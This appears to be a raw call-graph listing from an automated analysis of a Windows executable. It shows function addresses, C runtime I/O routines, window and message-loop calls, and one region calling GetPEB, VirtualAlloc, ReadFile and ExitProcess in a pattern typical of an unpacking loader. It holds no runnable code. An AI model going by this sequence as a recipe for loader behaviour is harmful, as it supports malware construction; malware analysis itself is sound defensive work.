81660 40f3c9 81658->81660 81662 42cd05 GetOpenFileNameW 81659->81662 82417 40ffb0 78 API calls ctype 81660->82417 81662->81660 81664 40d732 81662->81664 81663 40f3d2 82418 410130 SHGetMalloc 81663->82418 81664->81556 81664->81558 81666 40f3d9 82423 410020 90 API calls __wcsicoll 81666->82423 81668 40f3e7 82424 40f400 81668->82424 81671 42b9d3 81670->81671 81672 41025a LoadImageW RegisterClassExW 81670->81672 82464 443e8f EnumResourceNamesW LoadImageW 81671->82464 82463 4102f0 7 API calls 81672->82463 81675 40d790 81677 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 81675->81677 81676 42b9da 81677->81570 81678->81558 81679->81578 81680->81572 81681->81558 81682->81565 81684 401b76 _wcslen 81683->81684 81685 41171a 77 API calls 81684->81685 81688 401bc5 81684->81688 81686 401bad _memcpy_s 81685->81686 81687 41171a 77 API calls 81686->81687 81687->81688 81689 40d3b0 77 API calls 2 library calls 81688->81689 81689->81577 81690->81581 81691->81590 81692->81592 81748 40f5e0 81693->81748 81696 40ffa6 81696->81594 81698 42b6d8 81699 42b6e6 81698->81699 81804 434fe1 81698->81804 81700 413a88 __fclose_nolock 69 API calls 81699->81700 81702 42b6f5 81700->81702 81703 434fe1 108 API calls 81702->81703 81704 42b702 81703->81704 81704->81594 81705->81596 81706->81600 81707->81606 81709 40c3e4 81708->81709 81710 40c42c 81708->81710 81713 40c3f0 81709->81713 81714 42a475 81709->81714 81711 42a422 81710->81711 81712 40c435 81710->81712 81716 42a427 81711->81716 81717 42a445 81711->81717 81718 40c441 81712->81718 81719 42a455 81712->81719 82407 4042f0 81713->82407 82416 453155 77 API calls 81714->82416 81724 40c3fb 81716->81724 82413 453155 77 API calls 81716->82413 82414 453155 77 API calls 81717->82414 81721 4042f0 77 API calls 81718->81721 82415 453155 77 API calls 81719->82415 81721->81724 81724->81610 81727 41171a 77 API calls 81726->81727 81728 40c088 81727->81728 81729 41171a 77 API calls 81728->81729 81730 402061 81729->81730 81731 401a70 77 API calls 81730->81731 81731->81614 81732->81616 81733->81622 81734->81627 81735->81632 81736->81643 81737->81634 81738->81646 81739->81649 81740->81651 81741->81651 81742->81651 81743->81621 81744->81626 81745->81633 81746->81644 81747->81651 81808 40f580 81748->81808 81750 40f5f8 _strcat ctype 81816 40f6d0 81750->81816 81755 42b2ee 81845 4151b0 81755->81845 81757 40f679 81757->81755 81758 40f681 81757->81758 81832 414e94 81758->81832 81763 40f68b 81763->81696 81767 452574 81763->81767 81764 42b31d 81764->81764 81851 415484 81764->81851 81766 42b33d 81768 41557c _fseek 107 API calls 81767->81768 81769 4525df 81768->81769 82352 4523ce 81769->82352 81772 4525fc 81772->81698 81773 4151b0 __fread_nolock 83 API calls 81774 45261d 81773->81774 81775 4151b0 __fread_nolock 83 API calls 81774->81775 81776 45262e 81775->81776 81777 4151b0 __fread_nolock 83 API calls 81776->81777 81778 452649 81777->81778 81779 4151b0 __fread_nolock 83 API calls 81778->81779 81780 452666 81779->81780 81781 41557c _fseek 107 API calls 81780->81781 81782 452682 81781->81782 81783 4138ba _malloc 69 API calls 81782->81783 81784 45268e 81783->81784 81785 4138ba _malloc 69 API calls 81784->81785 81786 45269b 81785->81786 81787 4151b0 __fread_nolock 83 API calls 81786->81787 81788 4526ac 81787->81788 81789 44afdc GetSystemTimeAsFileTime 81788->81789 81790 4526bf 81789->81790 81791 4526d5 81790->81791 81792 4526fd 81790->81792 81795 413a88 __fclose_nolock 69 API calls 81791->81795 81793 452704 81792->81793 81794 45275b 81792->81794 82358 44b195 81793->82358 81797 413a88 __fclose_nolock 69 API calls 81794->81797 81798 4526df 81795->81798 81801 452759 81797->81801 81799 413a88 __fclose_nolock 69 API calls 81798->81799 81802 4526e8 81799->81802 81800 452753 81803 413a88 __fclose_nolock 69 API calls 81800->81803 81801->81698 81802->81698 81803->81801 81805 434ff1 81804->81805 81806 434feb 81804->81806 81805->81699 81807 414e94 __fcloseall 108 API calls 81806->81807 81807->81805 81809 429440 81808->81809 81810 40f589 _wcslen 81808->81810 81811 40f58f WideCharToMultiByte 81810->81811 81812 40f5d8 81811->81812 81813 40f5ad 81811->81813 81812->81750 81814 41171a 77 API calls 81813->81814 81815 40f5bb WideCharToMultiByte 81814->81815 81815->81750 81817 40f6dd _strlen 81816->81817 81864 40f790 81817->81864 81820 414e06 81883 414d40 81820->81883 81822 40f666 81822->81755 81823 40f450 81822->81823 81824 40f45a _strcat _memcpy_s __write_nolock 81823->81824 81825 4151b0 __fread_nolock 83 API calls 81824->81825 81826 40f531 81824->81826 81828 42936d 81824->81828 81966 41557c 81824->81966 81825->81824 81826->81757 81829 41557c _fseek 107 API calls 81828->81829 81830 429394 81829->81830 81831 4151b0 __fread_nolock 83 API calls 81830->81831 81831->81826 81833 414ea0 __lseeki64 81832->81833 81834 414ed1 81833->81834 81835 414eb4 81833->81835 81838 415965 __lock_file 70 API calls 81834->81838 81842 414ec9 __lseeki64 81834->81842 82105 417f23 69 API calls __getptd_noexit 81835->82105 81837 414eb9 82106 417ebb 7 API calls 2 library calls 81837->82106 81840 414ee9 81838->81840 82089 414e1d 81840->82089 81842->81763 82174 41511a 81845->82174 81847 4151c8 81848 44afdc 81847->81848 82345 4431e0 81848->82345 81850 44affd 81850->81764 81852 415490 __lseeki64 81851->81852 81853 4154bb 81852->81853 81854 41549e 81852->81854 81856 415965 __lock_file 70 API calls 81853->81856 82349 417f23 69 API calls __getptd_noexit 81854->82349 81857 4154c3 81856->81857 81859 4152e7 __ftell_nolock 73 API calls 81857->81859 81858 4154a3 82350 417ebb 7 API calls 2 library calls 81858->82350 81861 4154cf 81859->81861 82351 4154e8 LeaveCriticalSection LeaveCriticalSection _ftell 81861->82351 81863 4154b3 __lseeki64 81863->81766 81866 40f7ae _memset 81864->81866 81867 40f628 81866->81867 81868 415258 81866->81868 81867->81820 81869 415285 81868->81869 81870 415268 81868->81870 81869->81870 81872 41528c 81869->81872 81879 417f23 69 API calls __getptd_noexit 81870->81879 81881 41c551 105 API calls 14 library calls 81872->81881 81873 41526d 81880 417ebb 7 API calls 2 library calls 81873->81880 81876 4152b2 81877 41527d 81876->81877 81882 4191c9 103 API calls 6 library calls 81876->81882 81877->81866 81879->81873 81881->81876 81882->81877 81884 414d4c __lseeki64 81883->81884 81885 414d5f 81884->81885 81888 414d95 81884->81888 81935 417f23 69 API calls __getptd_noexit 81885->81935 81887 414d64 81936 417ebb 7 API calls 2 library calls 81887->81936 81902 41e28c 81888->81902 81891 414d9a 81892 414da1 81891->81892 81893 414dae 81891->81893 81937 417f23 69 API calls __getptd_noexit 81892->81937 81895 414dd6 81893->81895 81896 414db6 81893->81896 81920 41dfd8 81895->81920 81938 417f23 69 API calls __getptd_noexit 81896->81938 81899 414d74 __lseeki64 @_EH4_CallFilterFunc@8 81899->81822 81903 41e298 __lseeki64 81902->81903 81904 418407 __lock 69 API calls 81903->81904 81917 41e2a6 81904->81917 81905 41e31b 81940 41e3bb 81905->81940 81906 41e322 81907 416fb6 __malloc_crt 69 API calls 81906->81907 81909 41e32c 81907->81909 81909->81905 81945 4189e6 InitializeCriticalSectionAndSpinCount __lseeki64 81909->81945 81910 41e3b0 __lseeki64 81910->81891 81912 418344 __mtinitlocknum 69 API calls 81912->81917 81914 41e351 81915 41e35c 81914->81915 81916 41e36f EnterCriticalSection 81914->81916 81918 413a88 __fclose_nolock 69 API calls 81915->81918 81916->81905 81917->81905 81917->81906 81917->81912 81943 4159a6 70 API calls __lock 81917->81943 81944 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 81917->81944 81918->81905 81928 41dffb __wopenfile 81920->81928 81921 41e015 81950 417f23 69 API calls __getptd_noexit 81921->81950 81922 41e1e9 81922->81921 81926 41e247 81922->81926 81924 41e01a 81951 417ebb 7 API calls 2 library calls 81924->81951 81947 425db0 81926->81947 81928->81921 81928->81922 81952 4136bc 81 API calls 2 library calls 81928->81952 81931 41e1e2 81931->81922 81953 4136bc 81 API calls 2 library calls 81931->81953 81933 41e201 81933->81922 81954 4136bc 81 API calls 2 library calls 81933->81954 81935->81887 81937->81899 81938->81899 81939 414dfc LeaveCriticalSection LeaveCriticalSection _ftell 81939->81899 81946 41832d LeaveCriticalSection 81940->81946 81942 41e3c2 81942->81910 81943->81917 81944->81917 81945->81914 81946->81942 81955 425ce4 81947->81955 81949 414de1 81949->81939 81950->81924 81952->81931 81953->81933 81954->81922 81956 425cf0 __lseeki64 81955->81956 81957 425d03 81956->81957 81960 425d41 81956->81960 81958 417f23 __set_error_mode 69 API calls 81957->81958 81959 425d08 81958->81959 81961 417ebb __set_error_mode 7 API calls 81959->81961 81962 4255c4 __tsopen_nolock 134 API calls 81960->81962 81965 425d17 __lseeki64 81961->81965 81963 425d5b 81962->81963 81964 425d82 __sopen_helper LeaveCriticalSection 81963->81964 81964->81965 81965->81949 81969 415588 __lseeki64 81966->81969 81967 415596 81997 417f23 69 API calls __getptd_noexit 81967->81997 81968 4155c4 81979 415965 81968->81979 81969->81967 81969->81968 81972 41559b 81998 417ebb 7 API calls 2 library calls 81972->81998 81978 4155ab __lseeki64 81978->81824 81980 415977 81979->81980 81981 415999 EnterCriticalSection 81979->81981 81980->81981 81982 41597f 81980->81982 81983 4155cc 81981->81983 81984 418407 __lock 69 API calls 81982->81984 81985 4154f2 81983->81985 81984->81983 81986 415512 81985->81986 81987 415502 81985->81987 81989 415524 81986->81989 82000 4152e7 81986->82000 82054 417f23 69 API calls __getptd_noexit 81987->82054 82017 41486c 81989->82017 81996 415507 81999 4155f7 LeaveCriticalSection LeaveCriticalSection _ftell 81996->81999 81997->81972 81999->81978 82001 41531a 82000->82001 82002 4152fa 82000->82002 82004 41453a __fileno 69 API calls 82001->82004 82055 417f23 69 API calls __getptd_noexit 82002->82055 82005 415320 82004->82005 82008 41efd4 __locking 73 API calls 82005->82008 82006 4152ff 82056 417ebb 7 API calls 2 library calls 82006->82056 82009 415335 82008->82009 82010 4153a9 82009->82010 82012 415364 82009->82012 82016 41530f 82009->82016 82057 417f23 69 API calls __getptd_noexit 82010->82057 82013 41efd4 __locking 73 API calls 82012->82013 82012->82016 82014 415404 82013->82014 82015 41efd4 __locking 73 API calls 82014->82015 82014->82016 82015->82016 82016->81989 82018 414885 82017->82018 82022 4148a7 82017->82022 82019 41453a __fileno 69 API calls 82018->82019 82018->82022 82020 4148a0 82019->82020 82058 41c3cf 103 API calls 6 library calls 82020->82058 82023 41453a 82022->82023 82024 41455e 82023->82024 82025 414549 82023->82025 82029 41efd4 82024->82029 82059 417f23 69 API calls __getptd_noexit 82025->82059 82027 41454e 82060 417ebb 7 API calls 2 library calls 82027->82060 82030 41efe0 __lseeki64 82029->82030 82031 41f003 82030->82031 82032 41efe8 82030->82032 82034 41f011 82031->82034 82037 41f052 82031->82037 82081 417f36 69 API calls __getptd_noexit 82032->82081 82083 417f36 69 API calls __getptd_noexit 82034->82083 82035 41efed 82082 417f23 69 API calls __getptd_noexit 82035->82082 82061 41ba3b 82037->82061 82039 41f016 82084 417f23 69 API calls __getptd_noexit 82039->82084 82042 41f01d 82085 417ebb 7 API calls 2 library calls 82042->82085 82043 41f058 82045 41f065 82043->82045 82046 41f07b 82043->82046 82071 41ef5f 82045->82071 82086 417f23 69 API calls __getptd_noexit 82046->82086 82047 41eff5 __lseeki64 82047->81996 82050 41f073 82088 41f0a6 LeaveCriticalSection __unlock_fhandle 82050->82088 82051 41f080 82087 417f36 69 API calls __getptd_noexit 82051->82087 82054->81996 82055->82006 82057->82016 82058->82022 82059->82027 82062 41ba47 __lseeki64 82061->82062 82063 41baa2 82062->82063 82066 418407 __lock 69 API calls 82062->82066 82064 41bac4 __lseeki64 82063->82064 82065 41baa7 EnterCriticalSection 82063->82065 82064->82043 82065->82064 82067 41ba73 82066->82067 82068 41ba8a 82067->82068 82070 4189e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 82067->82070 82069 41bad2 ___lock_fhandle LeaveCriticalSection 82068->82069 82069->82063 82070->82068 82072 41b9c4 __lseeki64_nolock 69 API calls 82071->82072 82073 41ef6e 82072->82073 82074 41ef84 SetFilePointer 82073->82074 82075 41ef74 82073->82075 82077 41efa3 82074->82077 82078 41ef9b GetLastError 82074->82078 82076 417f23 __set_error_mode 69 API calls 82075->82076 82079 41ef79 82076->82079 82077->82079 82080 417f49 __dosmaperr 69 API calls 82077->82080 82078->82077 82079->82050 82080->82079 82081->82035 82082->82047 82083->82039 82084->82042 82086->82051 82087->82050 82088->82047 82090 414e31 82089->82090 82091 414e4d 82089->82091 82135 417f23 69 API calls __getptd_noexit 82090->82135 82094 41486c __flush 103 API calls 82091->82094 82097 414e46 82091->82097 82093 414e36 82136 417ebb 7 API calls 2 library calls 82093->82136 82096 414e59 82094->82096 82108 41e680 82096->82108 82107 414f08 LeaveCriticalSection LeaveCriticalSection _ftell 82097->82107 82100 41453a __fileno 69 API calls 82101 414e67 82100->82101 82112 41e5b3 82101->82112 82103 414e6d 82103->82097 82104 413a88 __fclose_nolock 69 API calls 82103->82104 82104->82097 82105->81837 82107->81842 82109 41e690 82108->82109 82110 414e61 82108->82110 82109->82110 82111 413a88 __fclose_nolock 69 API calls 82109->82111 82110->82100 82111->82110 82113 41e5bf __lseeki64 82112->82113 82114 41e5e2 82113->82114 82115 41e5c7 82113->82115 82117 41e5f0 82114->82117 82120 41e631 82114->82120 82152 417f36 69 API calls __getptd_noexit 82115->82152 82154 417f36 69 API calls __getptd_noexit 82117->82154 82118 41e5cc 82153 417f23 69 API calls __getptd_noexit 82118->82153 82123 41ba3b ___lock_fhandle 70 API calls 82120->82123 82122 41e5f5 82155 417f23 69 API calls __getptd_noexit 82122->82155 82125 41e637 82123->82125 82128 41e652 82125->82128 82129 41e644 82125->82129 82126 41e5fc 82156 417ebb 7 API calls 2 library calls 82126->82156 82157 417f23 69 API calls __getptd_noexit 82128->82157 82137 41e517 82129->82137 82130 41e5d4 __lseeki64 82130->82103 82133 41e64c 82158 41e676 LeaveCriticalSection __unlock_fhandle 82133->82158 82135->82093 82159 41b9c4 82137->82159 82139 41e57d 82172 41b93e 70 API calls 2 library calls 82139->82172 82140 41e527 82140->82139 82141 41e55b 82140->82141 82143 41b9c4 __lseeki64_nolock 69 API calls 82140->82143 82141->82139 82144 41b9c4 __lseeki64_nolock 69 API calls 82141->82144 82146 41e552 82143->82146 82147 41e567 CloseHandle 82144->82147 82145 41e585 82148 41e5a7 82145->82148 82173 417f49 69 API calls 3 library calls 82145->82173 82150 41b9c4 __lseeki64_nolock 69 API calls 82146->82150 82147->82139 82151 41e573 GetLastError 82147->82151 82148->82133 82150->82141 82151->82139 82152->82118 82153->82130 82154->82122 82155->82126 82157->82133 82158->82130 82160 41b9d1 82159->82160 82161 41b9e9 82159->82161 82162 417f36 __read_nolock 69 API calls 82160->82162 82164 417f36 __read_nolock 69 API calls 82161->82164 82166 41ba2e 82161->82166 82163 41b9d6 82162->82163 82165 417f23 __set_error_mode 69 API calls 82163->82165 82167 41ba17 82164->82167 82168 41b9de 82165->82168 82166->82140 82169 417f23 __set_error_mode 69 API calls 82167->82169 82168->82140 82170 41ba1e 82169->82170 82171 417ebb __set_error_mode 7 API calls 82170->82171 82171->82166 82172->82145 82173->82148 82175 415126 __lseeki64 82174->82175 82176 41516f 82175->82176 82177 415164 __lseeki64 82175->82177 82181 41513a _memset 82175->82181 82178 415965 __lock_file 70 API calls 82176->82178 82177->81847 82180 415177 82178->82180 82187 414f10 82180->82187 82203 417f23 69 API calls __getptd_noexit 82181->82203 82182 415154 82204 417ebb 7 API calls 2 library calls 82182->82204 82190 414f2e _memset 82187->82190 82202 414f4c 82187->82202 82188 414f37 82256 417f23 69 API calls __getptd_noexit 82188->82256 82190->82188 82193 414f8b 82190->82193 82190->82202 82194 4150d5 _memset 82193->82194 82195 4150a9 _memset 82193->82195 82196 41453a __fileno 69 API calls 82193->82196 82193->82202 82206 41ed9e 82193->82206 82236 41e6b1 82193->82236 82258 41ee9b 69 API calls 3 library calls 82193->82258 82260 417f23 69 API calls __getptd_noexit 82194->82260 82259 417f23 69 API calls __getptd_noexit 82195->82259 82196->82193 82201 414f3c 82257 417ebb 7 API calls 2 library calls 82201->82257 82205 4151a6 LeaveCriticalSection LeaveCriticalSection _ftell 82202->82205 82203->82182 82205->82177 82207 41edaa __lseeki64 82206->82207 82208 41edb2 82207->82208 82209 41edcd 82207->82209 82330 417f36 69 API calls __getptd_noexit 82208->82330 82210 41eddb 82209->82210 82216 41ee1c 82209->82216 82332 417f36 69 API calls __getptd_noexit 82210->82332 82213 41edb7 82331 417f23 69 API calls __getptd_noexit 82213->82331 82215 41ede0 82333 417f23 69 API calls __getptd_noexit 82215->82333 82218 41ee29 82216->82218 82219 41ee3d 82216->82219 82335 417f36 69 API calls __getptd_noexit 82218->82335 82221 41ba3b ___lock_fhandle 70 API calls 82219->82221 82224 41ee43 82221->82224 82222 41ede7 82334 417ebb 7 API calls 2 library calls 82222->82334 82223 41ee2e 82336 417f23 69 API calls __getptd_noexit 82223->82336 82227 41ee50 82224->82227 82228 41ee66 82224->82228 82226 41edbf __lseeki64 82226->82193 82261 41e7dc 82227->82261 82337 417f23 69 API calls __getptd_noexit 82228->82337 82232 41ee5e 82339 41ee91 LeaveCriticalSection __unlock_fhandle 82232->82339 82233 41ee6b 82338 417f36 69 API calls __getptd_noexit 82233->82338 82237 41e6c1 82236->82237 82242 41e6de 82236->82242 82343 417f23 69 API calls __getptd_noexit 82237->82343 82239 41e6d6 82239->82193 82240 41e6c6 82344 417ebb 7 API calls 2 library calls 82240->82344 82242->82239 82243 41e713 82242->82243 82340 423600 82242->82340 82245 41453a __fileno 69 API calls 82243->82245 82246 41e727 82245->82246 82247 41ed9e __read 81 API calls 82246->82247 82248 41e72e 82247->82248 82248->82239 82249 41453a __fileno 69 API calls 82248->82249 82250 41e751 82249->82250 82250->82239 82251 41453a __fileno 69 API calls 82250->82251 82252 41e75d 82251->82252 82252->82239 82253 41453a __fileno 69 API calls 82252->82253 82254 41e769 82253->82254 82255 41453a __fileno 69 API calls 82254->82255 82255->82239 82256->82201 82258->82193 82259->82201 82260->82201 82262 41e813 82261->82262 82263 41e7f8 82261->82263 82265 41e822 82262->82265 82268 41e849 82262->82268 82264 417f36 __read_nolock 69 API calls 82263->82264 82267 41e7fd 82264->82267 82266 417f36 __read_nolock 69 API calls 82265->82266 82269 41e827 82266->82269 82271 417f23 __set_error_mode 69 API calls 82267->82271 82270 41e868 82268->82270 82281 41e87c 82268->82281 82272 417f23 __set_error_mode 69 API calls 82269->82272 82273 417f36 __read_nolock 69 API calls 82270->82273 82282 41e805 82271->82282 82275 41e82e 82272->82275 82277 41e86d 82273->82277 82274 41e8d4 82276 417f36 __read_nolock 69 API calls 82274->82276 82278 417ebb __set_error_mode 7 API calls 82275->82278 82279 41e8d9 82276->82279 82280 417f23 __set_error_mode 69 API calls 82277->82280 82278->82282 82283 417f23 __set_error_mode 69 API calls 82279->82283 82284 41e874 82280->82284 82281->82274 82281->82282 82285 41e8b0 82281->82285 82287 41e8f5 82281->82287 82282->82232 82283->82284 82288 417ebb __set_error_mode 7 API calls 82284->82288 82285->82274 82286 41e8bb ReadFile 82285->82286 82292 41ed62 GetLastError 82286->82292 82293 41e9e7 82286->82293 82289 416fb6 __malloc_crt 69 API calls 82287->82289 82288->82282 82291 41e90b 82289->82291 82296 41e931 82291->82296 82297 41e913 82291->82297 82294 41ebe8 82292->82294 82295 41ed6f 82292->82295 82293->82292 82300 41e9fb 82293->82300 82304 417f49 __dosmaperr 69 API calls 82294->82304 82309 41eb6d 82294->82309 82298 417f23 __set_error_mode 69 API calls 82295->82298 82301 423462 __lseeki64_nolock 71 API calls 82296->82301 82299 417f23 __set_error_mode 69 API calls 82297->82299 82302 41ed74 82298->82302 82303 41e918 82299->82303 82300->82309 82310 41ea17 82300->82310 82313 41ec2d 82300->82313 82305 41e93d 82301->82305 82306 417f36 __read_nolock 69 API calls 82302->82306 82307 417f36 __read_nolock 69 API calls 82303->82307 82304->82309 82305->82286 82306->82309 82307->82282 82308 413a88 __fclose_nolock 69 API calls 82308->82282 82309->82282 82309->82308 82311 41ea7d ReadFile 82310->82311 82318 41eafa 82310->82318 82314 41ea9b GetLastError 82311->82314 82323 41eaa5 82311->82323 82312 41eca5 ReadFile 82315 41ecc4 GetLastError 82312->82315 82321 41ecce 82312->82321 82313->82309 82313->82312 82314->82310 82314->82323 82315->82313 82315->82321 82316 41ebbe MultiByteToWideChar 82316->82309 82317 41ebe2 GetLastError 82316->82317 82317->82294 82318->82309 82319 41eb75 82318->82319 82320 41eb68 82318->82320 82326 41eb32 82318->82326 82319->82326 82327 41ebac 82319->82327 82322 417f23 __set_error_mode 69 API calls 82320->82322 82321->82313 82325 423462 __lseeki64_nolock 71 API calls 82321->82325 82322->82309 82323->82310 82324 423462 __lseeki64_nolock 71 API calls 82323->82324 82324->82323 82325->82321 82326->82316 82328 423462 __lseeki64_nolock 71 API calls 82327->82328 82329 41ebbb 82328->82329 82329->82316 82330->82213 82331->82226 82332->82215 82333->82222 82335->82223 82336->82222 82337->82233 82338->82232 82339->82226 82341 416fb6 __malloc_crt 69 API calls 82340->82341 82342 423615 82341->82342 82342->82243 82343->82240 82348 414cef GetSystemTimeAsFileTime __aulldiv 82345->82348 82347 4431ef 82347->81850 82348->82347 82349->81858 82351->81863 82353 4523e1 _wcscpy 82352->82353 82354 4151b0 83 API calls __fread_nolock 82353->82354 82355 44afdc GetSystemTimeAsFileTime 82353->82355 82356 452553 82353->82356 82357 41557c 107 API calls _fseek 82353->82357 82354->82353 82355->82353 82356->81772 82356->81773 82357->82353 82359 44b1b4 82358->82359 82360 44b1a6 82358->82360 82362 44b1ca 82359->82362 82363 414e06 140 API calls 82359->82363 82364 44b1c2 82359->82364 82361 414e06 140 API calls 82360->82361 82361->82359 82393 4352d1 83 API calls 2 library calls 82362->82393 82365 44b2c1 82363->82365 82364->81800 82365->82362 82368 44b2cf 82365->82368 82367 44b20d 82369 44b211 82367->82369 82370 44b23b 82367->82370 82371 414e94 __fcloseall 108 API calls 82368->82371 82376 44b2dc 82368->82376 82373 414e94 __fcloseall 108 API calls 82369->82373 82375 44b21e 82369->82375 82394 43526e 82370->82394 82371->82376 82373->82375 82374 44b22e 82374->81800 82375->82374 82378 414e94 __fcloseall 108 API calls 82375->82378 82376->81800 82377 44b242 82379 44b270 82377->82379 82380 44b248 82377->82380 82378->82374 82404 44b0af 113 API calls 82379->82404 82382 44b255 82380->82382 82385 414e94 __fcloseall 108 API calls 82380->82385 82383 44b265 82382->82383 82386 414e94 __fcloseall 108 API calls 82382->82386 82383->81800 82384 44b276 82405 43522c 69 API calls __fclose_nolock 82384->82405 82385->82382 82386->82383 82388 44b27c 82389 44b289 82388->82389 82390 414e94 __fcloseall 108 API calls 82388->82390 82391 44b299 82389->82391 82392 414e94 __fcloseall 108 API calls 82389->82392 82390->82389 82391->81800 82392->82391 82393->82367 82395 4138ba _malloc 69 API calls 82394->82395 82396 43527d 82395->82396 82397 4138ba _malloc 69 API calls 82396->82397 82398 43528d 82397->82398 82399 4138ba _malloc 69 API calls 82398->82399 82400 43529d 82399->82400 82402 4352bc 82400->82402 82406 43522c 69 API calls __fclose_nolock 82400->82406 82402->82377 82403 4352c8 82403->82377 82404->82384 82405->82388 82406->82403 82408 404304 82407->82408 82409 40431c 82407->82409 82408->82409 82410 40c060 77 API calls 82408->82410 82409->81724 82411 404561 82410->82411 82412 411421 __cinit 76 API calls 82411->82412 82412->82409 82413->81724 82414->81719 82415->81724 82416->81724 82417->81663 82419 410148 SHGetDesktopFolder 82418->82419 82422 4101a3 _wcscpy 82418->82422 82420 41015a _wcscpy 82419->82420 82419->82422 82421 41018a SHGetPathFromIDListW 82420->82421 82420->82422 82421->82422 82422->81666 82423->81668 82425 40f5e0 154 API calls 82424->82425 82426 40f417 82425->82426 82427 42ca37 82426->82427 82429 40f42c 82426->82429 82430 42ca1f 82426->82430 82428 452574 142 API calls 82427->82428 82432 42ca50 82428->82432 82455 4037e0 141 API calls 7 library calls 82429->82455 82456 43717f 112 API calls _printf 82430->82456 82436 42ca76 82432->82436 82437 42ca54 82432->82437 82434 40f446 82434->81664 82435 42ca2d 82435->82427 82439 41171a 77 API calls 82436->82439 82438 434fe1 108 API calls 82437->82438 82440 42ca5e 82438->82440 82454 42cacc ctype 82439->82454 82457 43717f 112 API calls _printf 82440->82457 82442 42ccc3 82444 413a88 __fclose_nolock 69 API calls 82442->82444 82443 42ca6c 82443->82436 82445 42cccd 82444->82445 82446 434fe1 108 API calls 82445->82446 82447 42ccda 82446->82447 82451 401b70 77 API calls 82451->82454 82454->82442 82454->82451 82458 445051 77 API calls _memcpy_s 82454->82458 82459 44c80c 89 API calls 3 library calls 82454->82459 82460 44b408 77 API calls 82454->82460 82461 402cc0 77 API calls 2 library calls 82454->82461 82462 4026a0 77 API calls ctype 82454->82462 82455->82434 82456->82435 82457->82443 82458->82454 82459->82454 82460->82454 82461->82454 82462->82454 82463->81675 82464->81676 82465 3533240 82479 3530e90 82465->82479 82467 3533309 82482 3533130 82467->82482 82469 3533332 CreateFileW 82471 3533381 82469->82471 82472 3533386 82469->82472 82472->82471 82473 353339d VirtualAlloc 82472->82473 82473->82471 82474 35333bb ReadFile 82473->82474 82474->82471 82475 35333d6 82474->82475 82476 3532130 12 API calls 82475->82476 82477 3533409 82476->82477 82478 353342c ExitProcess 82477->82478 82478->82471 82485 3534330 GetPEB 82479->82485 82481 353151b 82481->82467 82483 3533139 Sleep 82482->82483 82484 3533147 82483->82484 82486 353435a 82485->82486 82486->82481 82487 431914 82488 431920 82487->82488 82489 431928 82488->82489 82490 43193d 82488->82490 82751 45e62e 118 API calls 3 library calls 82489->82751 82752 47f2b4 176 API calls 82490->82752 82493 43194a 82500 4095b0 ctype 82493->82500 82753 45e62e 118 API calls 3 library calls 82493->82753 82494 409708 82497 4097af 82497->82494 82738 40d590 VariantClear 82497->82738 82499 4315b8 WaitForSingleObject 82499->82500 82502 4315d6 GetExitCodeProcess CloseHandle 82499->82502 82500->82494 82500->82497 82500->82499 82503 431623 Sleep 82500->82503 82509 40986e Sleep 82500->82509 82510 4098f1 TranslateMessage DispatchMessageW 82500->82510 82512 409894 82500->82512 82524 45e62e 118 API calls 82500->82524 82529 4319c9 VariantClear 82500->82529 82531 4092c0 VariantClear 82500->82531 82533 40b380 82500->82533 82557 409340 82500->82557 82590 409030 82500->82590 82604 40d300 82500->82604 82609 40d320 82500->82609 82615 409a40 82500->82615 82754 40e380 VariantClear ctype 82500->82754 82742 40d590 VariantClear 82502->82742 82506 43163b timeGetTime 82503->82506 82503->82512 82506->82512 82511 409880 timeGetTime 82509->82511 82509->82512 82510->82500 82511->82512 82512->82500 82513 431673 CloseHandle 82512->82513 82514 40d590 VariantClear 82512->82514 82515 43170c GetExitCodeProcess CloseHandle 82512->82515 82516 46e641 136 API calls 82512->82516 82518 46dd22 135 API calls 82512->82518 82521 431781 Sleep 82512->82521 82530 4092c0 VariantClear 82512->82530 82739 447e59 77 API calls 82512->82739 82740 453b07 79 API calls 82512->82740 82741 4646a2 78 API calls 82512->82741 82743 444233 90 API calls _wcslen 82512->82743 82744 457509 VariantClear 82512->82744 82745 404120 82512->82745 82749 4717e3 VariantClear 82512->82749 82750 436272 6 API calls 82512->82750 82513->82512 82514->82512 82515->82512 82516->82512 82518->82512 82521->82500 82524->82500 82529->82500 82530->82512 82531->82500 82534 40b3a5 82533->82534 82535 40b53d 82533->82535 82536 430a99 82534->82536 82542 40b3b6 82534->82542 82755 45e62e 118 API calls 3 library calls 82535->82755 82756 45e62e 118 API calls 3 library calls 82536->82756 82539 40b528 82539->82500 82540 430aae 82544 4092c0 VariantClear 82540->82544 82542->82540 82545 40b3f2 82542->82545 82556 40b4fd ctype 82542->82556 82543 430dc9 82543->82543 82544->82539 82546 40b429 82545->82546 82547 430ae9 VariantClear 82545->82547 82551 40b476 ctype 82545->82551 82549 40b43b ctype 82546->82549 82757 40e380 VariantClear ctype 82546->82757 82547->82549 82548 40b4eb 82548->82556 82758 40e380 VariantClear ctype 82548->82758 82549->82551 82554 41171a 77 API calls 82549->82554 82550 430d41 VariantClear 82550->82556 82551->82548 82552 430d08 ctype 82551->82552 82552->82550 82552->82556 82554->82551 82556->82539 82759 45e62e 118 API calls 3 library calls 82556->82759 82558 409386 82557->82558 82566 409395 82557->82566 82559 4042f0 77 API calls 82558->82559 82559->82566 82561 42fba9 82763 45e62e 118 API calls 3 library calls 82561->82763 82563 42fc07 82765 45e62e 118 API calls 3 library calls 82563->82765 82564 42fc85 82767 4781ae 142 API calls 82564->82767 82566->82561 82566->82563 82566->82564 82569 42fd4f 82566->82569 82570 42fcd8 82566->82570 82572 42fd39 82566->82572 82578 40946f 82566->82578 82582 40947b 82566->82582 82583 4094c1 82566->82583 82586 4092c0 VariantClear 82566->82586 82589 409484 ctype 82566->82589 82762 453155 77 API calls 82566->82762 82764 40c620 120 API calls 82566->82764 82766 45e62e 118 API calls 3 library calls 82566->82766 82573 4092c0 VariantClear 82569->82573 82769 47f2b4 176 API calls 82570->82769 82571 42fc9c 82571->82589 82768 45e62e 118 API calls 3 library calls 82571->82768 82771 45e62e 118 API calls 3 library calls 82572->82771 82573->82589 82575 42fce9 82575->82589 82770 45e62e 118 API calls 3 library calls 82575->82770 82760 409210 VariantClear 82578->82760 82584 4092c0 VariantClear 82582->82584 82583->82589 82761 404260 78 API calls 82583->82761 82584->82589 82586->82566 82587 4094e1 82588 4092c0 VariantClear 82587->82588 82588->82589 82589->82500 82772 409110 119 API calls 82590->82772 82592 42ceb6 82782 410ae0 VariantClear ctype 